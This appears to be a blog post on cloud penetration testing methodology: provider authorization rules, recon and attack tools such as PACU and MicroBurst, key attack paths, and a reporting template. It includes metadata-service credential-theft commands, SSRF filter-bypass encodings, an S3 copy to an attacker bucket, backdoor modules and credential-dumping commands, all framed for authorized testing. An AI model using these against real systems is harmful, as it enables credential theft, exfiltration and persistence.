Cloud Penetration Testing: Methodology for AWS, Azure, and GCP
A technical methodology for cloud penetration testing — authorization requirements, using PACU, ScoutSuite, and Prowler, common attack paths, and how to report findings effectively.
Cloud penetration testing differs from traditional network pentesting in important ways. There are no hosts to scan with nmap, no binaries to reverse engineer, and no network perimeter to breach. The attack surface is the API — a vast, well-documented collection of hundreds of services, each with its own permission model and potential for misconfiguration.
This post covers the methodology, tooling, and authorization requirements for cloud penetration testing.
Authorization: What You Need Before Starting
Unlike traditional pentesting, where the systems under test belong entirely to the customer, cloud penetration testing carries authorization requirements from the cloud provider in addition to the customer's written authorization.
AWS
AWS does not require pre-authorization for security testing against your own AWS resources. The AWS Customer Support Policy for Penetration Testing explicitly permits:
- EC2 instances (all types)
- NAT Gateways, Elastic Load Balancers
- RDS, CloudFront, API Gateway, Lambda, Lightsail
- Elastic Beanstalk, S3, Aurora
Prohibited activities:
- DNS zone walking of Route53 hosted zones
- DoS/DDoS testing
- Port flooding, protocol flooding, request flooding
- Testing resources you don't own
No prior approval is needed for permitted activities, but you should notify AWS if you're conducting large-scale testing.
Azure
Azure also allows penetration testing on your own resources without prior approval. Microsoft no longer requires advance notification, but your testing must comply with the Microsoft Cloud Penetration Testing Rules of Engagement. Azure prohibits:
- DoS/DDoS attacks
- Testing Azure infrastructure (shared components)
- Physical access testing
GCP
GCP requires you to comply with Google's Acceptable Use Policy and Terms of Service. No special approval or notification is needed for testing your own GCP projects.
Key Authorization Document Requirements
When conducting a cloud pentest for a customer, ensure you have:
- Scope document listing all account IDs, project IDs, and subscription IDs in scope
- Authorization letter signed by someone with authority to authorize the test
- Emergency contact who can halt the test if business impact occurs
- Out-of-scope exclusions — shared infrastructure, partner accounts, production vs. staging
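The scope document only protects you if it is enforced during testing. A minimal sketch of a scope guard (the account IDs and ARN below are placeholders) that halts before any action touches an out-of-scope account:

```python
# Hypothetical scope guard. Account IDs come from the signed scope document.
# ARN layout: arn:partition:service:region:account-id:resource
IN_SCOPE_ACCOUNTS = {"123456789012", "210987654321"}  # placeholder IDs

def account_id_from_arn(arn: str) -> str:
    """Return the account-id field of an ARN (empty for S3 bucket ARNs)."""
    parts = arn.split(":")
    if len(parts) < 6:
        raise ValueError(f"not a valid ARN: {arn}")
    return parts[4]

def assert_in_scope(arn: str) -> None:
    """Raise before any test action runs against an out-of-scope account."""
    account = account_id_from_arn(arn)
    # S3 bucket ARNs carry no account ID, so they can't be checked this way
    if account and account not in IN_SCOPE_ACCOUNTS:
        raise RuntimeError(f"{account} is OUT OF SCOPE -- halt testing of {arn}")

assert_in_scope("arn:aws:iam::123456789012:role/app-role")  # in scope: no error
```

Wiring a check like this into your tooling turns a scope violation into a hard failure instead of a conversation with legal.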
Reconnaissance Phase
IAM Enumeration Without Authentication
Some cloud metadata is publicly accessible. For AWS:
# Enumerate S3 buckets from subdomain patterns
# (bucket.s3.amazonaws.com or s3.amazonaws.com/bucket)
curl -s https://target-company.s3.amazonaws.com/ 2>&1 | grep -i "bucket"
# Check for exposed bucket listings
aws s3 ls s3://target-company-backups --no-sign-request 2>/dev/null
# Probe error responses for metadata leakage
curl -sI "https://s3.amazonaws.com/target-company-backups"
# 404 NoSuchBucket = bucket doesn't exist; 403 AccessDenied = exists but private;
# an x-amz-bucket-region header reveals the bucket's region
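The unauthenticated bucket probes above can be scripted. A sketch (bucket names are illustrative) that issues a HEAD request and maps the usual S3 status codes to a verdict:

```python
from urllib import request, error

def probe_bucket(name: str) -> int:
    """Unauthenticated HEAD against the bucket's virtual-hosted URL."""
    req = request.Request(f"https://{name}.s3.amazonaws.com/", method="HEAD")
    try:
        return request.urlopen(req, timeout=5).status
    except error.HTTPError as e:
        return e.code  # 403/404 arrive as HTTPError

def classify(status: int) -> str:
    """Map common S3 responses to a bucket-existence verdict."""
    if status == 404:
        return "does-not-exist"
    if status == 403:
        return "exists-but-private"
    if status in (200, 301):
        return "exists"
    return "unknown"

# Usage (network required):
#   for suffix in ("backups", "logs", "exports"):
#       print(suffix, classify(probe_bucket(f"target-company-{suffix}")))
```

Run the loop over a wordlist of company-name permutations to build the candidate bucket inventory before any authenticated testing starts.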
ScoutSuite: Multi-Cloud Reconnaissance
ScoutSuite performs comprehensive reconnaissance across all cloud services using read-only API access:
pip install scoutsuite
# AWS reconnaissance
scout aws --profile target-account --report-dir ./scoutsuite-report
# Azure reconnaissance
scout azure --cli --report-dir ./scoutsuite-report
# GCP reconnaissance
scout gcp --service-account /path/to/service-account.json \
--project-id target-project \
--report-dir ./scoutsuite-report
ScoutSuite generates an HTML report with findings organized by service and severity. It checks over 200 rules covering IAM, networking, storage, logging, and more.
Prowler: AWS CIS Benchmark Scanning
Prowler runs over 300 security checks mapped to CIS, PCI-DSS, HIPAA, GDPR, SOC2, and other frameworks:
pip install prowler
# Run all checks
prowler aws --profile target-account
# Run specific framework
prowler aws --compliance cis_2.0_aws --profile target-account
# Run checks for specific services
prowler aws --services iam s3 cloudtrail --profile target-account
# Output to OCSF for SIEM ingestion
prowler aws --output-formats ocsf --output-directory ./prowler-output
Post-Reconnaissance: Credential-Based Testing
Once you have valid credentials (obtained through the engagement scope — typically read-only access to start), escalate testing:
Enumerate IAM Permissions Without Triggering Alarms
The most common approach is to call IAM APIs to understand what a user can do:
# Who am I?
aws sts get-caller-identity
# What policies are attached to me?
aws iam list-attached-user-policies --user-name my-user
aws iam list-user-policies --user-name my-user
aws iam list-groups-for-user --user-name my-user
# Get inline and attached policy documents
aws iam get-user-policy --user-name my-user --policy-name inline-policy
aws iam get-policy --policy-arn arn:aws:iam::123456789012:policy/my-policy
aws iam get-policy-version \
--policy-arn arn:aws:iam::123456789012:policy/my-policy \
--version-id v1
A more efficient approach is brute-forcing permissions using enumerate-iam:
git clone https://github.com/andresriancho/enumerate-iam
cd enumerate-iam
python enumerate_iam.py \
--access-key AKIAIOSFODNN7EXAMPLE \
--secret-key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY \
--region us-east-1
This calls each AWS API and records which ones succeed, mapping effective permissions without requiring IAM read access.
PACU: AWS Attack Framework
PACU is the AWS equivalent of Metasploit — a modular framework for AWS attack simulation:
pip install pacu
# Start PACU
pacu
# Set credentials
set_keys # Enter access key, secret key, optional session token
# Run reconnaissance modules
run iam__enum_users_roles_policies_groups
run iam__enum_permissions
run ec2__enum_elastic_ips
run s3__enum
# Check for privilege escalation paths
run iam__privesc_scan
# Common attack modules
run iam__backdoor_assume_role # Add an attacker ARN to a role's trust policy
run ec2__startup_shell_script # Inject shell script via user data
run lambda__backdoor_new_users # Deploy Lambda to backdoor new IAM users
run cloudtrail__download_event_history # Download and analyze CloudTrail
PACU includes over 60 modules covering reconnaissance, privilege escalation, persistence, exfiltration, and lateral movement.
Key Attack Paths to Test
1. Metadata Service Credential Theft
If you have code execution on an EC2 instance (via web app vulnerability or SSH):
# IMDSv1 (no token required)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/MyRole
# IMDSv2 (requires session token)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/MyRole
If IMDSv2 is not enforced, test SSRF via any HTTP request the application makes:
# Test SSRF using blind HTTP request
https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
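Naive SSRF filters often block only the literal string `169.254.169.254`, so it is worth testing alternate spellings of the same address. A sketch generating standard IP-address encodings (the `target.com/fetch` endpoint is the hypothetical one from above):

```python
# Alternate encodings of the IMDS address for testing string-matching SSRF
# filters. These are standard IP notations, not application-specific bypasses.
def imds_variants() -> list:
    a, b, c, d = 169, 254, 169, 254
    dotless = (a << 24) | (b << 16) | (c << 8) | d
    return [
        "169.254.169.254",
        str(dotless),                # dotless decimal: 2852039166
        hex(dotless),                # dotless hex: 0xa9fea9fe
        "[::ffff:169.254.169.254]",  # IPv4-mapped IPv6
        "[fd00:ec2::254]",           # EC2's IPv6 IMDS address
    ]

for host in imds_variants():
    print(f"https://target.com/fetch?url=http://{host}/latest/meta-data/")
```

Whether each variant resolves depends on the HTTP client library the target application uses; many parse dotless decimal and hex, fewer handle the IPv6 forms.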
2. Container Metadata Service
For ECS tasks and Fargate:
# ECS task credential endpoint (different from EC2 IMDS)
curl "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
# Returns temporary credentials for the task role
3. S3 Cross-Account Exfiltration
Test whether data can be exfiltrated to an attacker-controlled account:
# Attempt to copy sensitive object to attacker account S3
aws s3 cp s3://victim-bucket/sensitive-file.csv s3://attacker-bucket/ \
--acl bucket-owner-full-control
This succeeds if the victim bucket doesn't restrict outbound copies and the attacker bucket accepts cross-account uploads.
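When you can read the victim bucket's policy (`aws s3api get-bucket-policy`), a quick static check finds the overly broad grants that make unauthenticated reads and cross-account copies possible. A sketch (the example policy is fabricated):

```python
# Flag policy statements that allow anonymous access ("Principal": "*").
def public_statements(policy: dict) -> list:
    flagged = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") == "Allow" and \
           stmt.get("Principal") in ("*", {"AWS": "*"}):
            flagged.append(stmt)
    return flagged

example = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::victim-bucket/*",
    }],
}
print(public_statements(example))
```

A production-grade check would also evaluate `Condition` blocks (e.g. `aws:SourceVpce`), which can make an apparently public statement harmless.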
Azure Attack Tooling
MicroBurst
MicroBurst is an Azure reconnaissance and attack framework:
# Install
Install-Module -Name Az
git clone https://github.com/NetSPI/MicroBurst
# Import
Import-Module .\MicroBurst\MicroBurst.psm1
# Enumerate storage accounts
Invoke-EnumerateAzureBlobs -Base "targetcompany"
# Dump credentials from Key Vaults, App Services, and Automation accounts
Get-AzPasswords
# Find exposed app credentials in App Services
Get-AzWebAppPublishingCredentials -ResourceGroupName "production"
ROADtools for Entra ID
ROADtools is an Entra ID reconnaissance framework:
pip install roadrecon
# Authenticate
roadrecon auth --device-code
# Gather data
roadrecon gather
# Launch web GUI
roadrecon gui
ROADtools builds a local database of all Entra ID objects — users, groups, applications, service principals, conditional access policies — allowing graph-based analysis of attack paths.
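The graph-based analysis is just shortest-path search over "can control / can act as" edges. A toy sketch (the objects and edges below are illustrative, not ROADtools output) showing how a compromised user chains to a privileged role:

```python
from collections import deque

# Toy Entra ID control graph: an edge A -> B means "A can control or act as B".
EDGES = {
    "user:alice":         ["group:helpdesk"],
    "group:helpdesk":     ["app:password-reset"],
    "app:password-reset": ["sp:reset-svc"],
    "sp:reset-svc":       ["role:privileged-auth-admin"],
}

def attack_path(start: str, target: str) -> list:
    """BFS for the shortest control path from start to target; [] if none."""
    queue, seen = deque([[start]]), {start}
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            return path
        for nxt in EDGES.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return []

print(attack_path("user:alice", "role:privileged-auth-admin"))
```

In a real assessment the edge set comes from the roadrecon database (group memberships, app ownership, role assignments), and every hop in the returned path is a finding candidate.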
Reporting Findings
Cloud pentest findings require a different reporting structure than traditional pentests because the audience includes DevOps engineers and cloud architects who may not be familiar with offensive security terminology.
Finding Template
### [SEVERITY] Publicly Accessible S3 Bucket Contains Customer PII
**Risk**: Critical
**CVSS**: 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
**Affected Resource**: arn:aws:s3:::target-company-customer-exports
**Description**
The S3 bucket `target-company-customer-exports` has Block Public Access
disabled and a bucket policy granting `s3:GetObject` to `*`. The bucket
contains customer export files including names, email addresses, and
hashed passwords for approximately 2.3M customers.
**Evidence**
$ aws s3 ls s3://target-company-customer-exports --no-sign-request
2025-01-15 03:42:11 1847392 customer_export_2025_01_15.csv
$ aws s3 cp s3://target-company-customer-exports/customer_export_2025_01_15.csv . --no-sign-request
download: s3://target-company-customer-exports/customer_export_2025_01_15.csv
**Impact**
Unauthenticated access to 2.3M customer records constitutes a GDPR
reportable breach and may trigger regulatory notification requirements.
**Remediation**
1. Enable S3 Block Public Access on the bucket immediately:
aws s3api put-public-access-block --bucket target-company-customer-exports \
--public-access-block-configuration BlockPublicAcls=true,...
2. Remove the public bucket policy
3. Audit all other buckets for similar configurations
4. Enable account-level Block Public Access to prevent recurrence
**References**
- CIS AWS Foundations Benchmark 2.1.5
- AWS Documentation: Blocking public access to S3 storage
Scope Limitations and Responsible Disclosure
Cloud penetration testing has specific scope considerations that don't exist in traditional testing:
- Never test shared infrastructure (AWS Lambda service itself, Azure's Fabric, GCP's control plane)
- Don't delete or modify data unless explicitly authorized (even within scope)
- Stop and notify the customer immediately if you find evidence of an existing breach
- Don't exfiltrate real customer data — document access, capture metadata, then stop
- Test in lower environments (staging) before production unless specifically required
Cloud pentesting findings should be tracked and remediated using the same ticket system as software vulnerabilities. Track mean time to remediate (MTTR) by severity: critical findings should be remediated within 24 hours, high within 7 days, medium within 30 days.
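Those remediation targets are easy to compute from the ticket tracker. A sketch (the findings tuples are fabricated sample data) that reports MTTR per severity and flags SLA breaches against the targets above:

```python
from datetime import datetime, timedelta

# SLA targets from the text: critical 24h, high 7d, medium 30d
SLA = {
    "critical": timedelta(hours=24),
    "high": timedelta(days=7),
    "medium": timedelta(days=30),
}

def mttr_by_severity(findings):
    """findings: iterable of (severity, opened, closed) tuples."""
    buckets = {}
    for sev, opened, closed in findings:
        buckets.setdefault(sev, []).append(closed - opened)
    return {sev: sum(ds, timedelta()) / len(ds) for sev, ds in buckets.items()}

def sla_breaches(findings):
    """Findings whose remediation time exceeded the SLA for their severity."""
    return [f for f in findings if f[0] in SLA and f[2] - f[1] > SLA[f[0]]]

findings = [
    ("critical", datetime(2025, 1, 15, 9), datetime(2025, 1, 15, 20)),  # 11h: ok
    ("high",     datetime(2025, 1, 15, 9), datetime(2025, 1, 25, 9)),   # 10d: breach
]
print(mttr_by_severity(findings))
print(sla_breaches(findings))
```

Reporting both numbers each quarter makes it obvious whether cloud findings are actually being treated with the same discipline as software vulnerabilities.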